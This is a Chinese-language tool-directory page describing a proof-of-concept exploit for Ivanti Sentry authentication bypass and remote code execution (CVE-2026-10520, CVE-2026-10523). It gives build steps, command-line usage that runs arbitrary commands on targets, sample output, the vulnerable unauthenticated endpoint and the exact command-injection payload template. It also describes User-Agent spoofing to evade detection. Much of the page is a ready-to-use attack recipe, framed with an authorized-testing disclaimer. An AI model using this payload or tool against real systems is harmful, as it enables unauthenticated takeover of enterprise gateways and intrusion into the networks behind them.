Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10523-Ivanti-sentry — Ivanti Sentry认证绕过和远程代码执行漏洞(CVE-2026-10520、CVE-2026-10523)的概念验证检测工具。发送精心构造的API请求以执行系统命令并验证易受攻击的部署。 | Kitploit
工具/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制身份验证
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ivanti Sentry认证绕过和远程代码执行漏洞(CVE-2026-10520、CVE-2026-10523)的概念验证检测工具。发送精心构造的API请求以执行系统命令并验证易受攻击的部署。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库网站
3132个月前尚未审核
分享

CVE-2026-10523 - Ivanti Sentry RCE 检测工具

一个全面的概念验证检测工具,用于测试 Ivanti Sentry 中与身份验证绕过和远程代码执行相关的漏洞。该工具可识别存在 CVE-2026-10520 和 CVE-2026-10523 漏洞的系统。

概述

本项目旨在检测并验证 Ivanti Sentry 实例是否存在严重的身份验证绕过和远程代码执行缺陷。该工具通过 Ivanti Sentry API 端点发送特制消息,以执行系统命令并提取结果,帮助安全研究人员和渗透测试人员识别存在漏洞的部署。

漏洞详情

CVE-2026-10520

Ivanti Sentry 中的身份验证绕过漏洞,允许未经身份验证访问受限 API 端点。

CVE-2026-10523

Ivanti Sentry 中的远程代码执行漏洞,当与身份验证绕过结合时,可通过消息 API 执行任意系统命令。

功能特性

  • 未经身份验证即可检测存在漏洞的 Ivanti Sentry 实例
  • 系统命令执行能力,用于概念验证
  • 支持 HTTP 和 HTTPS 连接,可绕过 TLS 验证
  • 支持代理设置,便于通过中间设备进行测试
  • 从 XML 响应中干净地提取命令输出
  • 安全的错误处理,并提供有用的反馈信息
  • 可配置超时时间和响应大小限制

环境要求

  • Go 1.26.4 或更高版本
  • 可访问目标 Ivanti Sentry 实例的网络连接
  • 包含协议(HTTP 或 HTTPS)的有效目标 URL

安装

克隆仓库并进入项目目录:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry cd CVE-2026-10523-Ivanti-sentry

初始化模块并获取包依赖

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

构建可执行文件:

root@kitploit:~
go build -o tot_poc tot_poc.go

使用方法

屏幕截图

该工具需要两个必填参数:目标 URL 和要执行的命令。

基本用法

屏幕截图

在目标上运行简单命令:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

命令行选项

  • -url(必填):目标基础 URL,包含协议(例如 https://127.0.0.1:8443)
  • -cmd(必填):用于漏洞检测而执行的命令(例如 "uname -a"、"id"、"whoami")
  • -p 或 -proxy(可选):用于路由流量的代理地址和端口(例如 127.0.0.1:8080)

使用示例

屏幕截图

使用简单的系统信息命令检测漏洞:

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

使用代理配置运行:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

执行命令以提取系统信息:

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

输出

该工具将显示:

  1. 包含漏洞信息的横幅
  2. 目标 URL、命令和代理配置(如适用)
  3. 指示请求进度的实时状态消息
  4. 如果目标存在漏洞,则显示命令执行结果
  5. 如果目标不存在漏洞或连接失败,则显示错误消息

成功检测输出

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

失败检测输出

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

技术细节

攻击向量

该工具利用 /mics/api/v2/sentry/mics-config/handleMessage 端点,该端点无需身份验证即可访问。载荷构造如下:

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

响应会在成功标签内以 XML 格式包含命令输出。

安全特性

  • 绕过 TLS 验证以测试自签名证书
  • 可配置的 HTTP 超时时间,防止请求挂起
  • 限制响应大小(10 MB),防止内存耗尽
  • 对格式错误的响应进行适当的错误处理
  • User-Agent 伪装,以规避简单的检测机制

工作原理

  1. 解析命令行参数,获取目标 URL 和命令
  2. 创建 HTTP 客户端,可选择配置代理
  3. 使用用户提供的命令构造载荷
  4. 向存在漏洞的端点发送 POST 请求
  5. 从 XML 响应结构中提取命令输出
  6. 相应显示结果或错误消息

免责声明

本工具仅供授权的安全测试和研究使用。用户全权负责确保在测试任何系统之前已获得适当授权。未经授权访问计算机系统属于违法行为。作者不对因使用本工具而造成的滥用或损害承担任何责任。

要求与限制

  • 目标必须是存在漏洞的 Ivanti Sentry 实例
  • 需要与目标系统建立网络连接
  • 每个请求的默认超时时间为 10 秒
  • 最大响应大小限制为 10 MB
  • 仅对运行存在漏洞版本的 Ivanti Sentry 的系统有效
  • 出于测试目的,TLS 证书验证已禁用

作者

GhostGTR666 - Gagaltotal666

仓库

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

许可证

本项目按现状提供,仅用于安全研究和教育目的。

参考

  • CVE-2026-10520:Ivanti Sentry 身份验证绕过
  • CVE-2026-10523:Ivanti Sentry 远程代码执行
下载工具